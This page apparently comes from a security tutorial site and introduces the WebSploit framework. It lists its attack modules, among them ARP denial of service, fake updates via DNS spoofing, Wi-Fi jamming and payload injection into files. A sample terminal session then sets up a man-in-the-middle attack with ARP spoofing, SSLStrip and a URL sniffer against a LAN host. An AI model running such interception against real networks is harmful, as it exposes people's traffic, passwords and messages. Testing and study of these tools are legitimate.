WebSploit

Description

WebSploit Advanced MITM Framework

[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]CloudFlare resolver
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack
[+]Wifi Honeypot
[+]Wifi Jammer
[+]Wifi Dos
[+]Wifi Mass De-Authentication Attack
[+]Bluetooth POD Attack

Example

cyborg@cyborg:~$ sudo websploit
[sudo] password for cyborg: 


 __      __          __                      ___               __
/\ \  __/\ \        /\ \                    /\_ \           __/\ \__
\ \ \/\ \ \ \     __\ \ \____    ____  _____\//\ \     ___ /\_\ \ ,_\
 \ \ \ \ \ \ \  /'__`\ \ '__`\  /',__\/\ '__`\\ \ \   / __`\/\ \ \ \/
  \ \ \_/ \_\ \/\  __/\ \ \L\ \/\__, `\ \ \L\ \\_\ \_/\ \L\ \ \ \ \ \_
   \ `\___x___/\ \____\\ \_,__/\/\____/\ \ ,__//\____\ \____/\ \_\ \__\
    '\/__//__/  \/____/ \/___/  \/___/  \ \ \/ \/____/\/___/  \/_/\/__/
                                         \ \_\
                                          \/_/ 	

		--=[WebSploit FrameWork
	+---**---==[Version :2.0.3
	+---**---==[Codename :CyberTron
	+---**---==[Available Modules : 16
		--=[Update Date : [r2.0.3-116 9.10.2012]



wsf > help   

WebSploit
Commands		Description
---------------		----------------
set 			Set Value Of Options To Modules
scan			Scan Wifi (Wireless Modules)
stop			Stop Attack & Scan (Wireless Modules)
run 			Execute Module
use 			Select Module For Use
os 			Run Linux Commands(ex : os ifconfig)
back			Exit Current Module
show modules		Show Modules of Current Database
show options		Show Current Options Of Selected Module
upgrade			Get New Version
update			Update Websploit Framework 
about			About US

wsf > show modules

Web Modules			Description
-------------------		---------------------
web/apache_users		Scan Directory Of Apache Users
web/dir_scanner			Directory Scanner
web/wmap			Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma				PHPMyAdmin Login Page Scanner

WebSploit
Network Modules			Description
-------------------		---------------------
network/arp_dos			ARP Cache Denial Of Service Attack
network/mfod			Middle Finger Of Doom Attack
network/mitm			Man In The Middle Attack
network/mlitm			Man Left In The Middle Attack
network/webkiller		TCP Kill Attack
network/fakeupdate		Fake Update Attack Using DNS Spoof
network/fakeap			Fake Access Point


Exploit Modules			Description
-------------------		---------------------
exploit/autopwn			Metasploit Autopwn Service
exploit/browser_autopwn		Metasploit Browser Autopwn Service
exploit/java_applet		Java Applet Attack (Using HTML)


Wireless Modules		Description
-------------------		---------------------
wifi/wifi_jammer		Wifi Jammer
wifi/wifi_dos			Wifi Dos Attack


wsf > use network/mitm
wsf:MITM > show options

Options		 Value				 RQ	 Description
---------	--------------			----	--------------
Interface	eth0				yes	Network Interface Name
ROUTER		192.168.1.1			yes	Router IP Address
TARGET		192.168.1.2			yes	Target IP Address
SNIFFER		driftnet			yes	Sniffer Name (Select From Sniffer List)
SSL		true				yes	SSLStrip, For SSL Hijacking(true or false)

WebSploit
Sniffers	 Description
------------	--------------
dsniff		 Sniff All Passwords
msgsnarf	 Sniff All Text Of Victim Messengers
urlsnarf	 Sniff Victim Links
driftnet	 Sniff Victim Images

wsf:MITM > set TARGET 192.168.1.18
TARGET =>  192.168.1.18
wsf:MITM > set INTERFACE eth0
INTERFACE =>  eth0
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ... 
[*]ARP Spoofing ... 
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?